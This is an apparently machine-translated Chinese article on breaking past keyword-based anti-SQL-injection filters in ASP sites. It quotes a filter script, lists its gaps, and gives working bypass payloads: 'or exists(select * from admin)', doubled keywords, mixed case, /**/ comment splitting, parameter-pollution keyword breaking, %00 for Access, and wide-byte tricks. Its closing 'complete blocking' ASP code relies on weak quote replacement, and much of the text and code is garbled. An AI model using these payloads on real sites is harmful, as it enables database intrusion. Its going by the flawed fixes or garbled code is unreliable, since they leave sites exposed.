A summary of methods, experiences, and skills used to break through the SQL anti-injection filter program

After reading the following post, I want to write something. The original post content is as follows:

 
Title: is anti-injection really useful?
 
By: 798146410
 
Time:
 
Content:
 
Many anti-injection codes are circulating on the Internet. Are these actually useful? This is an anti-injection code found online.
 
For example:
 
''' -------- Define part ------------------
DimFy_Post, Fy_Get, Fy_In, Fy_Inf, Fy_Xh, Fy_db, Fy_dbstr '''' to customize the strings to be filtered. Use "|" to separate Fy_In = "''' |; | and | exec | insert | select | delete | update | count | * | % | chr | mid | master | truncate | char | declare | <|> |-| _ "Fy_Inf = split (Fy_In, "|") IfRequest. form <> "" ThenForEachFy_PostInRequest.FormForFy_Xh = 0 ToUbound (Fy_Inf) IfInstr (LCase (Request. form (Fy_Post), Fy_Inf (Fy_Xh) <> 0ThenResponse. write "<Script Language = JavaScript> alert ('''' ↓
The website inserts the above Code in conn. asp to filter all query statements that can be filtered. Take a closer look, it seems that a = (equal sign) is not filtered .. Try again...
 
And so on .. An equal sign .... When we enter and 1 = 1 and 1 = 2, a dialog box is displayed .. Record our ip address and submission method.

Can we convert "and" into statements without these characters? The base64 character is returned. Let's proceed with the experiment... Successful. Here

I found several other sites and found that some of them can be injected using this method. Some cannot .. You may try it during injection.

The filter Code contains the following problems:

1. In the visual test, the Get and cookie submission methods are not filtered. Only post is filtered. asp programmers prefer to use the Request ("a") method to obtain data, this statement is not limited to the data submission method. It can be any of the get, cookie, or post statements that can obtain data (if multiple methods are submitted simultaneously, the data is obtained by priority. I remember the default priority order is Request. queryString → Request. form → Request. cookies → Request. serverVariable.

2. Response. if there is no Response after Write. end is also a virtual setting. You can simply disable js or other packet sending methods. The principle is simple and I don't want to explain it. Because your code is incomplete (when I write this article, the landlord only pasted a small piece of code, it was completed later. This is not the focus, but the key is the method described in this article. Therefore, it is impossible to determine whether the defect exists.

3. Let's take a look at it. The character set it filters has no Keyword: or, which is a serious mistake.

4 ,...... Www.2cto.com

These disadvantages: even better anti-injection filters should not exist unless the author is too idiotic...

You can refer to the following methods to convert and into "NONE:

1. work und. For example, if it is not filtered or, you can use: test. asp? Id = 999 or exists (select * from admin), test. asp? Id = 999 or 1> 2. Note: This 999 must be a non-existent ID, so that the value of the expression before or is false, in this way, the return value of the entire statement is subject to the expression operation value after or.

2. If you encounter a directly replaced filter, you can use: test. asp? Id = 1 aandnd 1> 2. After a replacement is executed, the result is: test. asp? Id = 1 and 1> 2. Similar to other keywords, this is a simple and easy-to-understand method. Most Filtering programs have this defect.

3. You can also use statements that disrupt uppercase and lowercase letters, because in Asp, string functions such as Replace and Instr are case sensitive by default, for example: sEleCT <> select, this is a problem that is easily overlooked.

4. Use the annotation method. For example, if spaces are filtered, use: test. asp? Id = 1/**/and/**/1 = 1. For example, when filtering select statements, you can: union /**//*! Select */1, 2, 3, 4, or: union/**/s/**/elec/**/t/**/1, 2, 3, 4, or even: union /**//*! 5100select */1 & id = 2, 3 & id = is the mysql version number.

5. The principle of breaking keywords is very simple. If you submit: test. asp? Id = 127/* & id = */an & id = d/**/1 = 1, Asp receives the following results: 127/*, */, d/**/1 = 1. Pay attention to the spaces in the middle. Then, filter out the commas and spaces and convert them to: 127/**/and/**/1 = 1, then you know ...... Php is invalid and directly overwritten. This is a demanding use condition and requires filtering of commas and spaces. However, I guess there are still many sites with this problem.

6. If spaces are filtered, the following characters can also be used:/**/, (which is a blank Chinese character), chr (10), and chr (13.

7 ,......

For the annotator in the SQL statement, add the following knowledge:

Access does not have a special annotator, so "/**/" "--" "#" cannot be used, but it can be replaced by an empty character "NULL" (% 00, example: 'Union SELECT Count (*) FROM admin % 00

About Asp broken keywords, specific knowledge can see: http://www.bkjia.com/Article/201104/87001.html

In addition, if it is a mysql database, there are still problems such as wide byte injection, which are not described one by one. For knowledge about wide byte injection, see:

 

PHP double-byte and wide-byte encoding vulnerability

Use GBK Double Byte encoding to break through the limit of single quotes escape in PHP for SQL Injection

Break through anti-injection filtering and continue SQL injection. There are a lot of skills and experience in this field. Here I just mention it a little. In fact, you can write a book. There are many divergent ideas and methods, please add.

Methods for completely blocking injection in Asp:

1. Number Type:

 
DimTmpTmp = Request ("test") IF Len (Tmp)> 9thenResponse. Write "fuck you! "Response. EndElseIFIsNumber (Tmp) = FalseThenResponse. Write" fuck you! "Response. EndElseIFInstr (Tmp," + ")> 0ThenResponse. Write" fuck you! "Response. EndElseIFInstr (Tmp,"-")> 0ThenResponse. Write" fuck you! "Response. EndElseIFInstr (Tmp,". ")> 0ThenResponse. Write" fuck you! "Response. EndElseResponse. Write" OK! "End IF
2. Balanced type:
 
DimTmp, ITmp = Request ("test") Tmp = Replace (Tmp, "'", "\'") Tmp = Replace (Tmp ,"""", "\") Tmp = Replace (Tmp, chr (10), "") Tmp = Replace (Tmp, chr (13), "") Response. write "OK! "
In this way, we can block it completely. There is no need to filter keywords and get a bunch of character sets. That method is too disgusting, and the efficiency is very low ...... The cause of SQL injection vulnerabilities is that programmers are not careful and lack security awareness. If programmers write programs at ordinary times, they should pay attention to and avoid these details, so why do we need to use third-party anti-injection programs for so-called repairs?

After a few years of development, the anti-injection program has already done a very good job, and it is not easy to break through. But with a little care, some of them can still be reused.

References:

Some injection techniques based on SQL injection (SQL injection)-Technical Articles

SQL bypass injection of the latest code

New Idea of ASP bypassing anti-injection: Breaking keywords

PHP double-byte and wide-byte encoding vulnerability

Use GBK Double Byte encoding to break through the limit of single quotes escape in PHP for SQL Injection

The complete code added by the landlord later:


<% Dim SQL _injdata, SQL _inj, SQL _Get, SQL _Post, SQL _Cookies, SQL _Data SQL _injdata = "<% | script | insert | select | delete | exec | cast | update | chr | master | truncate | declarei | eval" ifstopwords <> "" andinstr (LCase (request. serverVariables ("PATH_INFO"), "siteconfig. asp ") = 0thenSQL_injdata = SQL _injdata &" | "& stopwords endifSQL_inj = split (SQL _Injdata," | ") ifchecksqlin =" Yes "thenIfRequest. form <> "" ThenStopInjection (Request. form) IfRequest. queryString <> "" ThenStopInjection (Request. queryString) IfRequest. cookies <> "" ThenStopInjection (Request. cookies) endifFunctionStopInjection (values) ForEachSQL_Get Invalues ForSQL_Data = 0 ToUbound (SQL _inj) 'if instr (LCase (request (SQL _Get), SQL _Inj (SQL _DATA)> 0 Then if instr (LCase (replace (request (SQL _Get), chr (34), "'"), SQL _Inj (SQL _DATA)> 0 Then' ""
Cannot be directly written to the variable "SQL _injdata". Replace "" with "" here as "to the Response. write "<script> alert ('illegal information detected. This submission is forbidden! '); History. back () </script> "Response. end if next Next end function %>